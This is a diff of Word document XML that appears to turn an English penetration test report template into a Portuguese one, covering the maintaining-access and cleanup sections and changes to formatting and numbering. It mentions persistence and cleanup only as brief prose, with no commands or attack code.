-        <w:t>Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>i.e.</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit. </w:t>
-      </w:r>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t>…</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="11" w:name="_Toc59959357"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">John added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>meterpreter</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> service was installed on the machine to ensure that additional access could be established.</w:t>
-      </w:r>
+        <w:rPr>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Ttulo2"/>
         <w:spacing w:line="240" w:lineRule="auto"/>
         <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t>3.5</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="11"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
+          <w:b w:val="0"/>
+          <w:bCs w:val="0"/>
+          <w:color w:val="000000"/>
+          <w:u w:color="000000"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Limpeza</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+      </w:pPr>
+      <w:r>
+        <w:cr/>
+        <w:t xml:space="preserve">A fase de "limpeza" da avaliação garante que resquícios do teste de penetração sejam removidos. Frequentemente, fragmentos de ferramentas ou contas de usuário são deixados nos computadores de uma organização, o que pode resultar em problemas de segurança no </w:t>
+      </w:r>
+      <w:r>
+        <w:t>futuro.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="BodyA"/>
+        <w:rPr>
+          <w:rStyle w:val="None"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Após concluir as ações planejadas, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>Ary, Lucas e Adri</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">ano </w:t>
+      </w:r>
+      <w:r>
+        <w:t>remove</w:t>
+      </w:r>
+      <w:r>
+        <w:t>ram</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> todas as contas de usuário e senhas, assim como </w:t>
+      </w:r>
+      <w:r>
+        <w:t>outros programas</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> instalados no sistema. A </w:t>
+      </w:r>
+      <w:r>
+        <w:t>ISO9</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> não deveria precisar remover contas de usuário ou serviços do sistema.</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="12" w:name="_Toc59959358"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading"/>
+        <w:spacing w:line="240" w:lineRule="auto"/>
         <w:rPr>
           <w:rStyle w:val="None"/>
           <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc59959357"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -5709,11 +4508,13 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">3.5 Sample Report </w:t>
-      </w:r>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t xml:space="preserve">4.0 </w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="12"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="None"/>
@@ -5721,112 +4522,22 @@
           <w:b w:val="0"/>
           <w:bCs w:val="0"/>
           <w:color w:val="000000"/>
-          <w:u w:color="000000"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t>– House Cleaning</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="11"/>
+          <w:sz w:val="30"/>
+          <w:szCs w:val="30"/>
+          <w:u w:color="000000"/>
+        </w:rPr>
+        <w:t>Informações Adicionais</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="BodyA"/>
         <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>meticulous</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> and no remnants of our penetration test are left over is important.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:eastAsia="Roboto Regular" w:hAnsi="Roboto Regular" w:cs="Roboto Regular"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Heading"/>
-        <w:spacing w:line="240" w:lineRule="auto"/>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:eastAsia="Roboto Bold" w:hAnsi="Roboto Bold" w:cs="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-      </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc59959358"/>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:b w:val="0"/>
-          <w:bCs w:val="0"/>
-          <w:color w:val="000000"/>
-          <w:sz w:val="30"/>
-          <w:szCs w:val="30"/>
-          <w:u w:color="000000"/>
-        </w:rPr>
-        <w:t>4.0 Additional Items Not Mentioned in the Report</w:t>
-      </w:r>
-      <w:bookmarkEnd w:id="12"/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="BodyA"/>
-        <w:spacing w:line="288" w:lineRule="auto"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rStyle w:val="None"/>
-          <w:rFonts w:ascii="Roboto Regular" w:hAnsi="Roboto Regular"/>
-        </w:rPr>
-        <w:t>This section is placed for any additional items that were not mentioned in the overall report.</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:sectPr>
-      <w:headerReference w:type="default" r:id="rId11"/>
-      <w:footerReference w:type="default" r:id="rId12"/>
+      <w:headerReference w:type="default" r:id="rId16"/>
+      <w:footerReference w:type="default" r:id="rId17"/>
       <w:pgSz w:w="12240" w:h="15840"/>
       <w:pgMar w:top="1440" w:right="1440" w:bottom="1440" w:left="1440" w:header="720" w:footer="720" w:gutter="0"/>
       <w:cols w:space="720"/>
@@ -5944,62 +4655,21 @@
         <w:tab w:val="clear" w:pos="9360"/>
         <w:tab w:val="right" w:pos="9340"/>
       </w:tabs>
+      <w:jc w:val="center"/>
       <w:rPr>
-        <w:sz w:val="18"/>
-        <w:szCs w:val="18"/>
+        <w:noProof/>
+        <w:sz w:val="96"/>
+        <w:szCs w:val="74"/>
       </w:rPr>
     </w:pPr>
     <w:r>
       <w:rPr>
         <w:rStyle w:val="NoneA"/>
         <w:noProof/>
+        <w:sz w:val="96"/>
+        <w:szCs w:val="74"/>
       </w:rPr>
-      <w:drawing>
-        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4AB236AE" wp14:editId="31E88E20">
-          <wp:extent cx="5943600" cy="1099820"/>
-          <wp:effectExtent l="0" t="0" r="0" b="0"/>
-          <wp:docPr id="2" name="officeArt object" descr="red-header.png"/>
-          <wp:cNvGraphicFramePr/>
-          <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
-            <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
-              <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
-                <pic:nvPicPr>
-                  <pic:cNvPr id="1073741825" name="red-header.png" descr="red-header.png"/>
-                  <pic:cNvPicPr>
-                    <a:picLocks noChangeAspect="1"/>
-                  </pic:cNvPicPr>
-                </pic:nvPicPr>
-                <pic:blipFill>
-                  <a:blip r:embed="rId1"/>
-                  <a:stretch>
-                    <a:fillRect/>
-                  </a:stretch>
-                </pic:blipFill>
-                <pic:spPr>
-                  <a:xfrm>
-                    <a:off x="0" y="0"/>
-                    <a:ext cx="5943600" cy="1099820"/>
-                  </a:xfrm>
-                  <a:prstGeom prst="rect">
-                    <a:avLst/>
-                  </a:prstGeom>
-                  <a:ln w="12700" cap="flat">
-                    <a:noFill/>
-                    <a:miter lim="400000"/>
-                  </a:ln>
-                  <a:effectLst/>
-                </pic:spPr>
-              </pic:pic>
-            </a:graphicData>
-          </a:graphic>
-        </wp:inline>
-      </w:drawing>
-    </w:r>
-    <w:r>
-      <w:rPr>
-        <w:rStyle w:val="NoneA"/>
-      </w:rPr>
-      <w:br/>
+      <w:t>ISO9</w:t>
     </w:r>
   </w:p>
 </w:hdr>
@@ -6335,6 +5005,119 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="4D3117F1"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6A164166"/>
+    <w:lvl w:ilvl="0" w:tplc="04160001">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="04160003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="04160005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="04160001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="04160003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="04160005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="04160001" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="04160003" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="04160005" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="5344241A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
@@ -6655,23 +5438,26 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="648F1753"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="7E446BC4"/>
     <w:numStyleLink w:val="ImportedStyle1"/>
   </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="50427811">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="1678195474">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="305818905">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1976524005">
     <w:abstractNumId w:val="0"/>
+  </w:num>
+  <w:num w:numId="5" w16cid:durableId="988023576">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -7389,6 +6175,18 @@
         <w14:prstDash w14:val="solid"/>
         <w14:bevel/>
       </w14:textOutline>
+    </w:rPr>
+  </w:style>
+  <w:style w:type="character" w:styleId="MenoPendente">
+    <w:name w:val="Unresolved Mention"/>
+    <w:basedOn w:val="Fontepargpadro"/>
+    <w:uiPriority w:val="99"/>
+    <w:semiHidden/>
+    <w:unhideWhenUsed/>
+    <w:rsid w:val="00EB7ED6"/>
+    <w:rPr>
+      <w:color w:val="605E5C"/>
+      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
     </w:rPr>
   </w:style>
 </w:styles>
